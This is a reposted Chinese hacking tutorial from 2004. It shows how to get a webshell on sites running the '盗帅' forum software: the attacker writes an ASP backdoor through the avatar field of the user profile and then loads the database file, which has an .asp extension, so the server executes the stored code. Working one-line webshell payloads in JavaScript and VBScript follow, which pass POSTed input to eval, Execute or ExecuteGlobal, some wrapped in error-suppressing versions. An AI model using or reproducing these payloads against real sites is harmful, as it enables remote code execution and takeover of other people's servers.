首页 电脑 电脑学堂 查看内容

修改数据库得到webshell

2004-10-20 07:34 765 0

摘要: 作者:虚幻灵者  http://www.wrsky.com 在海洋2005中新增了一个向数据库写代码从而插入后门的方法。既然asp后门可以向数据库写后门。我们为什么不可以呢。就拿最新版的盗帅作例子,...
关键词: 后门 容错 数据库 代码 格式 最新版 虚幻 函数 asp 头像

作者:虚幻灵者  http://www.wrsky.com 在海洋2005中新增了一个向数据库写代码从而插入后门的方法。既然asp后门可以向数据库写后门。我们为什么不可以呢。就拿最新版的盗帅作例子,我们可以注册成功后在修改个人资料中的头像中向数据库写入asp后门的代码,因为只有这个地方没有长度限制。<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('xuhuan')+'')</SCRIPT><%on error resume next//以上语句是将一个微型asp后门写入到数据库中,<%on error resume next用来容错,//用来将后面的干扰代码注释掉!这样当我们提交盗帅的数据库路径http://www.xxx.com/db/daidalos.asp时,由于后缀为asp,IE将会以asp的形式解析代码。我们的asp后门也就成功执行了!用微型asp后门的客户端连接试试.能不能连上了! 补充: 附:1:JAVASCRIPT<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>容错格式:<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>try{eval(Request.form('#')+'')}catch(e){}</SCRIPT>2:VBSCRIPT<%Execute(Request.form("?"))%>容错格式:Execute("On Error Resume Next:"&Request.form("?"))VBSCRIPT的另一函数:<%ExecuteGlobal(Request.form("!"))%>容错格式:<%ExecuteGlobal("On Error Resume Next:"&Request.form("!"))%>
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部